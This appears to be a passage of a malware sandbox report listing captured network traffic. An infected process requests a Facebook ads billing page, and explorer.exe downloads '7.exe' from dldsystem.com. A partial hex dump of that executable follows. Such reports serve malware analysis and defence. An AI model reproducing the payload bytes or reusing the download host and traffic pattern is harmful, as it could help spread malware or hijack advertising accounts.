c1 c5 b5 ce c1 c8 b5 d3 c0 c6 ba d4 bc d5 ba cc c3 c8 be d8 bc c2 c1 d3 b9 cc c2 d2 be c3 c6 cb cb d1 c2 d4 c5 ce b9 cc c3 ca bb dc be c4 bb d4 d1 c6 c4 cb be c6 b7 cc
                                                                                                                                  Data Ascii: {=77=C5
                                                                                                                                  2022-10-17 20:06:34 UTC211INData Raw: 00 00 00 00 00 00 00 af d8 8a 29 a4 dd 95 21 a6 dc 89 24 ab de 85 31 ad de 82 23 ac de 8e 26 a6 e6 8f 2a a4 d6 84 21 ad e0 93 28 b3 de 9a 25 ab da 8a 1b a4 de 94 2c af d0 8f 21 af e3 8b 1e 82 8e 80 27 a5 db 8b 27 00 00 00 00 37 25 4d 21 3d 1c 5a 1c 3f 26 54 1c 43 2a 4c 1e 40 23 52 29 41 19 4e 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                  Data Ascii: )!$1#&*!(%,!''7%M!=Z?&TC*L@#R)AN


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  1192.168.2.549695157.240.20.35443C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:00 UTC218OUTGET /ads/manager/account_settings/account_billing HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                  Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                  Host: www.facebook.com
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                  viewport-width: 1920
                                                                                                                                  sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"
                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                  sec-ch-prefers-color-scheme: light
                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                  2022-10-17 20:07:00 UTC219INHTTP/1.1 302 Found
                                                                                                                                  Location: https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing
                                                                                                                                  content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net facebook.com fbwifigateway.net *.fbwifigateway.net fbcdn.net cdninstagram.com *.cdninstagram.com oculuscdn.com *.oculuscdn.com www.meta.com *.www.meta.com;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
                                                                                                                                  2022-10-17 20:07:00 UTC221INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 20 62 6c 6f 62 3a 20 64 61 74 61 3a 20 27 73 65 6c 66 27 3b 73 74 79 6c 65 2d 73 72 63 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 64 61 74 61 3a 20 2a 2e 66 61 63 65 62
                                                                                                                                  Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.faceb


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                  10192.168.2.549712162.144.15.231443C:\Windows\explorer.exe
                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                  2022-10-17 20:07:21 UTC1167OUTGET /7.exe HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Host: dldsystem.com
                                                                                                                                  2022-10-17 20:07:22 UTC1167INHTTP/1.1 200 OK
                                                                                                                                  Date: Mon, 17 Oct 2022 20:07:22 GMT
                                                                                                                                  Server: Apache
                                                                                                                                  Upgrade: h2,h2c
                                                                                                                                  Connection: Upgrade, close
                                                                                                                                  Last-Modified: Mon, 17 Oct 2022 20:00:24 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Content-Length: 354304
                                                                                                                                  Content-Type: application/x-msdownload
                                                                                                                                  2022-10-17 20:07:22 UTC1167INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d5 2e 52 17 91 4f 3c 44 91 4f 3c 44 91 4f 3c 44 85 24 3f 45 9c 4f 3c 44 85 24 39 45 37 4f 3c 44 85 24 38 45 87 4f 3c 44 85 24 3d 45 92 4f 3c 44 91 4f 3d 44 cd 4f 3c 44 f1 35 38 45 80 4f 3c 44 f1 35 3f 45 87 4f 3c 44 f1 35 39 45 dc 4f 3c 44 f5 35 35 45 90 4f 3c 44 f5 35 3e 45 90 4f 3c 44 52 69 63 68 91 4f 3c 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04
                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$.RO<DO<DO<D$?EO<D$9E7O<D$8EO<D$=EO<DO=DO<D58EO<D5?EO<D59EO<D55EO<D5>EO<DRichO<DPEL
                                                                                                                                  2022-10-17 20:07:22 UTC1175INData Raw: 83 ff 10 89 75 e0 8d 45 d0 0f 43 45 d0 c6 04 30 00 eb 43 8b 4d e4 8b fe 89 c8 2b fa 2b c2 3b f8 77 21 89 75 e0 83 f9 10 8d 75 d0 0f 43 75 d0 57 03 f2 6a 00 56 e8 6f 67 00 00 83 c4 0c c6 04 3e 00 eb 13 6a 00 57 c6 45 cc 00 8d 4d d0 ff 75 cc 57 e8 a3 26 00 00 83 7d e4 10 8d 7d d0 f2 0f 10 45 1c 0f 43 7d d0 83 ec 08 8b 45 c0 8b 75 e0 f2 0f 11 04 24 ff 75 c4 ff 70 14 8d 45 e8 6a 4c 50 ff 75 bc e8 c1 16 00 00 83 c4 10 50 56 57 e8 96 e5 ff ff 83 7d e4 10 8d 4d d0 8b 75 b8 0f 43 4d d0 50 51 ff 75 18 ff 75 c0 ff 75 10 ff 75 0c 56 ff 75 bc e8 41 12 00 00 8b 4d e4 83 c4 38 83 f9 10 72 28 8b 55 d0 41 8b c2 81 f9 00 10 00 00 72 10 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 77 29 51 52 e8 6f 4f 00 00 83 c4 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b 4d f0 33 cd
                                                                                                                                  Data Ascii: uECE0CM++;w!uuCuWjVog>jWEMuW&}}EC}Eu$upEjLPuPVW}MuCMPQuuuuVuAM8r(UArP#+w)QRoOMdY_^M3
                                                                                                                                  2022-10-17 20:07:22 UTC1183INData Raw: 35 42 00 64 a1 00 00 00 00 50 83 ec 08 56 a1 18 20 43 00 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b 75 08 8b 06 8b 40 04 8b 44 30 30 8b 48 04 89 4d f0 8b 01 ff 50 04 8d 45 ec c7 45 fc 00 00 00 00 50 e8 53 fb ff ff 83 c4 04 8b c8 8b 10 6a 0a 8b 42 20 ff d0 c7 45 fc ff ff ff ff 8b 4d f0 88 45 08 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 89 c1 6a 01 ff 12 ff 75 08 8b ce e8 b9 0a 00 00 8b ce e8 92 f8 ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e 8b e5 5d c3 55 8b ec 6a ff 68 04 36 42 00 64 a1 00 00 00 00 50 83 ec 48 a1 18 20 43 00 33 c5 89 45 f0 53 56 57 50 8d 45 f4 64 a3 00 00 00 00 8b 5d 08 8d 4d e8 6a 00 89 5d ec e8 7d 0d 00 00 c7 45 fc 00 00 00 00 8b 3d 1c 69 45 00 a1 0c 69 45 00 89 45 e0 85 ff 75 2f 57 8d 4d e4 e8 5b 0d 00 00 39 3d 1c 69 45 00 75 10 a1
                                                                                                                                  Data Ascii: 5BdPV C3PEdu@D00HMPEEPSjB EMEtPtjuMdY^]Ujh6BdPH C3ESVWPEd]Mj]}E=iEiEEu/WM[9=iEu
                                                                                                                                  2022-10-17 20:07:22 UTC1190INData Raw: 14 8b 07 53 8b 70 10 8b ce ff 15 38 41 42 00 8b cf ff d6 8b c3 5e 5b 5f c3 83 c8 ff c3 55 8b ec 51 8b 45 10 53 8b d9 57 8b 7d 0c 85 c0 7f 0f 7c 04 85 ff 75 09 33 c0 33 d2 e9 c1 00 00 00 83 7b 38 00 74 0f 50 57 ff 75 08 e8 b7 00 00 00 e9 ac 00 00 00 8b 43 1c 56 8b f7 8b 08 85 c9 74 3b 8b 43 2c 8b 00 89 45 fc 85 c0 74 2f 3b c7 72 05 8b c7 89 7d fc 50 51 ff 75 08 e8 2b 23 00 00 8b 4d fc 83 c4 0c 8b 45 08 2b f1 03 c1 89 45 fc 8b 43 2c 29 08 8b 43 1c 01 08 eb 06 8b 45 08 89 45 fc 83 7b 4c 00 74 4e 8b cb e8 e5 f7 ff ff 8b 4d fc 8b d6 b8 ff 0f 00 00 3b f0 76 24 ff 73 4c 50 6a 01 51 e8 73 78 00 00 8b 4d fc 2b f0 03 c8 83 c4 10 89 4d fc 8b d6 3d ff 0f 00 00 75 17 eb d3 85 d2 74 11 ff 73 4c 56 6a 01 51 e8 4b 78 00 00 83 c4 10 2b f0 8b 55 10 2b fe 8b c7 83 da 00 5e
                                                                                                                                  Data Ascii: Sp8AB^[_UQESW}|u33{8tPWuCVt;C,Et/;r}PQu+#ME+EC,)CEE{LtNM;v$sLPjQsxM+M=utsLVjQKx+U+^
                                                                                                                                  2022-10-17 20:07:22 UTC1199INData Raw: 00 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d f8 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 02 ef ff ff 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 9f 2c 00 00 83 c4 20 5e 5d c3 55 8b ec 8b 4d 0c 56 8b 75 08 89 0e e8 a3 23 00 00 8b 48 24 89 4e 04 e8 98 23 00 00 89 70 24 8b c6 5e 5d c3 55 8b ec 56 e8 87 23 00 00 8b 75 08 3b 70 24 75 0e 8b 76 04 e8 77 23 00 00 89 70 24 5e 5d c3 e8 6c 23 00 00 8b 48 24 83 c1 04 eb 07 3b f0 74 0b 8d 48 04 8b 01 85 c0 74 09 eb f1 8b 46 04 89 01 eb da e8 a1 6c 00 00 cc 55 8b ec 51 53 fc 8b 45 0c 8b 48 08 33 4d 0c e8 63 ee ff ff 8b 45 08 8b 40 04 83 e0 66 74 11 8b 45 0c c7 40 24 01 00 00 00 33 c0 40 eb 6c eb 6a 6a 01 8b 45 0c ff 70 18
                                                                                                                                  Data Ascii: E@MAd=];d_^[UVuN3jVvvjuvu, ^]UMVu#H$N#p$^]UV#u;p$uvw#p$^]l#H$;tHtFlUQSEH3McE@ftE@$3@ljjEp
                                                                                                                                  2022-10-17 20:07:22 UTC1207INData Raw: b6 42 f4 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 e5 f4 ff ff 8b 46 f5 3b 42 f5 0f 84 87 00 00 00 0f b6 c8 0f b6 42 f5 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 b8 f4 ff ff 0f b6 4e f6 0f b6 42 f6 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 96 f4 ff ff 0f b6 4e f7 0f b6 42 f7 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 74 f4 ff ff 0f b6 4e f8 0f b6 42 f8 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 52 f4 ff ff 8b 46 f9 3b 42 f9 0f 84 01 f8 ff ff 0f b6 42 f9 0f b6 4e f9 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 24 f4 ff ff 0f b6 4e fa 0f b6 42 fa 2b c8 74 0e 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff 85 c9 0f 85 02 f4 ff
                                                                                                                                  Data Ascii: B+t3EF;BB+t3ENB+t3ENB+t3EtNB+t3ERF;BBN+t3E$NB+t3E
                                                                                                                                  2022-10-17 20:07:22 UTC1215INData Raw: 45 fc 3b 47 10 72 07 89 47 10 b0 01 eb 02 32 c0 83 3e 00 75 06 85 db 74 02 89 1e 5f 5e 5b c9 c2 04 00 8b ff 53 56 8b f1 8d 8e 48 04 00 00 e8 dd 0a 00 00 84 c0 74 1b 33 db 39 5e 10 0f 85 c8 00 00 00 e8 8d 2e 00 00 c7 00 16 00 00 00 e8 78 0f 00 00 83 c8 ff 5e 5b c3 89 5e 38 89 5e 1c e9 85 00 00 00 ff 46 10 39 5e 18 0f 8c 8c 00 00 00 ff 76 1c 0f b6 46 31 8b ce 50 e8 8c fe ff ff 89 46 1c 83 f8 08 74 bc 83 f8 07 77 c7 ff 24 85 6d c8 40 00 8b ce e8 ea 00 00 00 eb 45 83 4e 28 ff 89 5e 24 88 5e 30 89 5e 20 89 5e 2c 88 5e 3c eb 38 8b ce e8 8f 00 00 00 eb 27 8b ce e8 16 05 00 00 eb 1e 89 5e 28 eb 21 8b ce e8 62 01 00 00 eb 10 8b ce e8 7f 01 00 00 eb 07 8b ce e8 c4 02 00 00 84 c0 0f 84 6a ff ff ff 8b 46 10 8a 00 88 46 31 84 c0 0f 85 6b ff ff ff ff 46 10 8b ce e8 29
                                                                                                                                  Data Ascii: E;GrG2>ut_^[SVHt39^.x^[^8^F9^vF1PFtw$m@EN(^$^0^ ^,^<8'^(!bjFF1kF)
                                                                                                                                  2022-10-17 20:07:22 UTC1222INData Raw: 48 04 83 60 08 00 89 08 8b 45 08 8b 40 0c 90 c1 e8 02 a8 01 8b 45 08 74 0b 6a fc 59 83 c0 0c f0 21 08 eb 23 8b 40 0c 90 83 e0 41 3c 41 75 18 8b 45 08 8b 40 0c 90 c1 e8 08 a8 01 75 0a 8b 45 08 c7 40 18 00 02 00 00 8b 45 08 8b 40 10 90 56 57 53 50 e8 4e 9a 00 00 23 c2 83 c4 10 83 f8 ff 75 04 0b c0 eb 02 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 a8 fd ff ff 83 c4 10 5d c3 6a 0c 68 40 13 43 00 e8 b6 9d ff ff 83 65 e4 00 8b 45 08 ff 30 e8 76 f2 ff ff 59 83 65 fc 00 8b 4d 0c e8 34 00 00 00 8b f0 89 75 e4 c7 45 fc fe ff ff ff e8 17 00 00 00 8b c6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c2 0c 00 8b 75 e4 8b 45 10 ff 30 e8 4b f2 ff ff 59 c3 8b ff 55 8b ec 51 56 8b f1 57 8b 06 8b 38 57 e8 8b 62 00 00 88 45 fc 8b 06 ff 30 8b 46
                                                                                                                                  Data Ascii: H`E@EtjY!#@A<AuE@uE@E@VWSPN#u3_^[]Uuuuu]jh@CeE0vYeM4uEMdY_^[uE0KYUQVW8WbE0F
                                                                                                                                  2022-10-17 20:07:22 UTC1230INData Raw: 65 e8 e8 d9 24 00 00 cc 8b ff 55 8b ec 33 c0 81 7d 08 63 73 6d e0 0f 94 c0 5d c3 8b ff 55 8b ec 83 ec 18 83 7d 10 00 75 12 e8 93 00 00 00 84 c0 74 09 ff 75 08 e8 ca 00 00 00 59 8d 45 0c c6 45 ff 00 89 45 e8 8d 4d fe 8d 45 10 89 45 ec 8d 45 ff 6a 02 89 45 f0 58 89 45 f8 89 45 f4 8d 45 f8 50 8d 45 e8 50 8d 45 f4 50 e8 54 fe ff ff 83 7d 10 00 74 02 c9 c3 ff 75 08 e8 01 00 00 00 cc 8b ff 55 8b ec e8 5d a3 00 00 83 f8 01 74 20 64 a1 30 00 00 00 8b 40 68 c1 e8 08 a8 01 75 10 ff 75 08 ff 15 4c 40 42 00 50 ff 15 50 40 42 00 ff 75 08 e8 4e 00 00 00 59 ff 75 08 ff 15 a0 40 42 00 cc 6a 00 ff 15 3c 40 42 00 85 c0 74 34 b9 4d 5a 00 00 66 39 08 75 2a 8b 48 3c 03 c8 81 39 50 45 00 00 75 1d b8 0b 01 00 00 66 39 41 18 75 12 83 79 74 0e 76 0c 83 b9 e8 00 00 00 00 74 03 b0
                                                                                                                                  Data Ascii: e$U3}csm]U}utuYEEEMEEEjEXEEEPEPEPT}tuU]t d0@huuL@BPP@BuNYu@Bj<@Bt4MZf9u*H<9PEuf9Auytvt
                                                                                                                                  2022-10-17 20:07:22 UTC1238INData Raw: 85 f4 fd ff ff 50 e8 0e 6f ff ff 33 c9 83 c4 0c 85 c0 0f 94 c1 eb 06 8b 8d 44 fd ff ff 89 4e 04 8b 47 08 89 06 8b 46 04 89 47 18 eb 1e 83 fb 01 75 0b 8b 85 38 fd ff ff 89 47 10 eb 0e 83 fb 05 75 09 8b 85 38 fd ff ff 89 47 14 6b c3 0c 57 8b b0 90 75 42 00 8b ce ff 15 38 41 42 00 ff d6 59 8b 8d 34 fd ff ff 85 c0 74 4a 8b 85 3c fd ff ff 89 0c 38 ff b4 9f a0 00 00 00 e8 a9 0f 00 00 8b 8d 30 fd ff ff 8b 85 20 fd ff ff 51 89 84 9f a0 00 00 00 e8 90 0f 00 00 8b 85 1c fd ff ff 59 59 89 47 08 33 c0 8b 4d fc 5f 5e 33 cd 5b e8 4c 52 ff ff c9 c3 81 f9 58 22 43 00 74 4a 8b f3 83 c9 ff 03 f6 8b 44 f7 28 f0 0f c1 08 75 39 ff 74 f7 28 e8 52 0f 00 00 ff 74 f7 24 e8 49 0f 00 00 ff b4 9f a0 00 00 00 e8 3d 0f 00 00 8b 85 3c fd ff ff 83 c4 0c 8b 8d 44 fd ff ff 89 0c 38 89 8c
                                                                                                                                  Data Ascii: Po3DNGFGu8Gu8GkWuB8ABY4tJ<80 QYYG3M_^3[LRX"CtJD(u9t(Rt$I=<D8
                                                                                                                                  2022-10-17 20:07:22 UTC1246INData Raw: 04 83 7d 18 02 75 14 80 39 30 75 0f 6a 03 8d 41 01 50 51 e8 d1 48 ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 45 f0 83 a0 50 03 00 00 fd 33 c0 e9 f5 fe ff ff 33 c0 50 50 50 50 50 e8 b9 92 ff ff cc 8b ff 55 8b ec 83 ec 0c 33 c0 56 57 ff 75 18 8d 7d f4 ff 75 14 ab ab ab 8d 45 f4 8b 7d 1c 50 8b 45 08 57 ff 70 04 ff 30 e8 c1 a9 00 00 83 c9 ff 83 c4 18 8b d0 39 4d 10 74 0e 8b 4d 10 33 c0 83 7d f4 2d 0f 94 c0 2b c8 ff 75 24 8b 75 0c 8d 45 f4 52 50 8b 45 f8 03 c7 50 33 c0 83 7d f4 2d 51 0f 94 c0 03 c6 50 e8 a7 a8 00 00 83 c4 18 85 c0 74 05 c6 06 00 eb 16 ff 75 20 8d 45 f4 6a 00 50 57 ff 75 10 56 e8 07 00 00 00 83 c4 18 5f 5e c9 c3 8b ff 55 8b ec 83 ec 14 8d 4d ec 53 56 57 ff 75 1c e8 d1 7f ff ff 8b 5d 14 33 d2 8b 75 10 8b 7d 08 8b 4b 04 49 38 55 18 74 14 3b ce 75 10 33
                                                                                                                                  Data Ascii: }u90ujAPQH}tEP33PPPPPU3VWu}uE}PEWp09MtM3}-+u$uERPEP3}-QPtu EjPWuV_^UMSVWu]3u}KI8Ut;u3
                                                                                                                                  2022-10-17 20:07:22 UTC1258INData Raw: ff ff ff 8d 8d 74 ff ff ff 89 7d cc 0f 94 c0 40 51 50 89 45 dc 8d 45 cc 50 8d 45 b8 50 e8 a5 87 00 00 83 c4 10 83 f8 ff 0f 84 af 01 00 00 8b 75 d4 4f 03 fe eb 7f 8a 54 01 2d f6 c2 04 74 1e 8a 44 01 2e 80 e2 fb 88 45 ec 8a 07 88 45 ed 8b 45 d4 6a 02 88 54 01 2d 8d 45 ec 50 eb 43 8a 07 88 45 e3 e8 49 8b ff ff 0f b6 4d e3 66 39 1c 48 7d 2c 8d 47 01 89 45 cc 3b 45 a4 0f 83 31 01 00 00 6a 02 8d 45 b8 57 50 e8 10 d3 ff ff 83 c4 0c 83 f8 ff 0f 84 45 01 00 00 8b 7d cc eb 18 6a 01 57 8d 45 b8 50 e8 f3 d2 ff ff 83 c4 0c 83 f8 ff 0f 84 28 01 00 00 53 53 6a 05 8d 45 e4 47 50 ff 75 dc 8d 45 b8 89 7d 9c 50 53 ff 75 88 e8 73 42 00 00 83 c4 20 89 45 cc 85 c0 0f 84 fe 00 00 00 53 8d 4d a0 51 50 8d 45 e4 50 ff 75 94 ff 15 b0 40 42 00 85 c0 0f 84 da 00 00 00 8b 75 b0 2b 75
                                                                                                                                  Data Ascii: t}@QPEEPEPuOT-tD.EEEjT-EPCEIMf9H},GE;E1jEWPE}jWEP(SSjEGPuE}PSusB ESMQPEPu@Bu+u
                                                                                                                                  2022-10-17 20:07:22 UTC1266INData Raw: 6a 01 ff 70 08 e8 7e 23 00 00 83 c4 18 85 c0 0f 85 39 ff ff ff e8 3a 73 ff ff c7 00 2a 00 00 00 33 c0 66 89 07 eb 41 39 b0 a8 00 00 00 75 11 8b 75 0c 8d 4e 01 8a 06 46 84 c0 75 f9 2b f1 eb 28 56 56 83 ce ff 56 ff 75 0c 6a 09 51 e8 37 23 00 00 83 c4 18 85 c0 75 0d e8 f7 72 ff ff c7 00 2a 00 00 00 eb 03 8d 70 ff 80 7d f0 00 74 0a 8b 4d e4 83 a1 50 03 00 00 fd 8b c6 5f 5e 5b c9 c3 8b ff 55 8b ec 83 ec 10 53 8b 5d 10 56 57 8b 7d 0c 33 f6 85 ff 75 3b 85 db 75 3b 85 ff 74 05 33 c0 66 89 07 8b 45 08 85 c0 74 02 89 30 ff 75 1c 8d 4d f0 e8 80 41 ff ff 8b c3 39 5d 18 77 03 8b 45 18 3d ff ff ff 7f 76 1e e8 87 72 ff ff 6a 16 eb 58 85 db 75 c5 e8 7a 72 ff ff 6a 16 5e 89 30 e8 66 53 ff ff eb 72 8d 4d f4 51 50 ff 75 14 57 e8 e8 fd ff ff 83 c4 10 83 f8 ff 75 12 85 ff 74
                                                                                                                                  Data Ascii: jp~#9:s*3fA9uuNFu+(VVVujQ7#ur*p}tMP_^[US]VW}3u;u;t3fEt0uMA9]wE=vrjXuzrj^0fSrMQPuWut
                                                                                                                                  2022-10-17 20:07:22 UTC1273INData Raw: 00 00 8d a4 24 00 00 00 00 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 00 de c1 c3 8d a4 24 00 00 00 00 90 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 20 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 00 eb 07 c6 85 70 ff ff ff 01 de c1 c3 90 dd d8 dd d8 db 2d b0 84 42 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 8d 49 00 dd d8 dd d8 db 2d c4 84 42 00 0a ed 74 02 d9 e0 0a c9 74 08 dd 05 d6 84 42 00 de c9 c3 0a c9 74 02 d9 e0 c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 c4 e0 89 45 e0 8b 45 18 89 45 f0 8b 45 1c 89 45 f4 eb 09 55 8b ec 83 c4 e0 89 45 e0 dd 5d f8 89 4d e4 8b 45 10 8b 4d 14 89 45 e8 89 4d ec 8d 45 08 8d
                                                                                                                                  Data Ascii: $bbi@tpp$bbi@t bbi@tpp-BppI-BttBtUEEEEEUE]MEMEME
                                                                                                                                  2022-10-17 20:07:22 UTC1281INData Raw: ff 59 89 75 fc 8b fe a1 00 67 45 00 89 7d e0 39 45 08 7c 1f 39 34 bd 00 65 45 00 75 31 e8 ed fe ff ff 89 04 bd 00 65 45 00 85 c0 75 14 6a 0c 5e 89 75 e4 c7 45 fc fe ff ff ff e8 15 00 00 00 eb a2 a1 00 67 45 00 83 c0 40 a3 00 67 45 00 47 eb bb 8b 75 e4 6a 07 e8 64 16 ff ff 59 c3 8b ff 55 8b ec 8b 45 08 8b c8 83 e0 3f c1 f9 06 6b c0 38 03 04 8d 00 65 45 00 50 ff 15 08 40 42 00 5d c3 8b ff 55 8b ec 8b 45 08 8b c8 83 e0 3f c1 f9 06 6b c0 38 03 04 8d 00 65 45 00 50 ff 15 0c 40 42 00 5d c3 8b ff 55 8b ec 53 56 8b 75 08 57 85 f6 78 67 3b 35 00 67 45 00 73 5f 8b c6 8b fe 83 e0 3f c1 ff 06 6b d8 38 8b 04 bd 00 65 45 00 f6 44 03 28 01 74 44 83 7c 03 18 ff 74 3d e8 c3 4f ff ff 83 f8 01 75 23 33 c0 2b f0 74 14 83 ee 01 74 0a 83 ee 01 75 13 50 6a f4 eb 08 50 6a f5 eb
                                                                                                                                  Data Ascii: YugE}9E|94eEu1eEuj^uEgE@gEGujdYUE?k8eEP@B]UE?k8eEP@B]USVuWxg;5gEs_?k8eED(tD|t=Ou#3+ttuPjPj
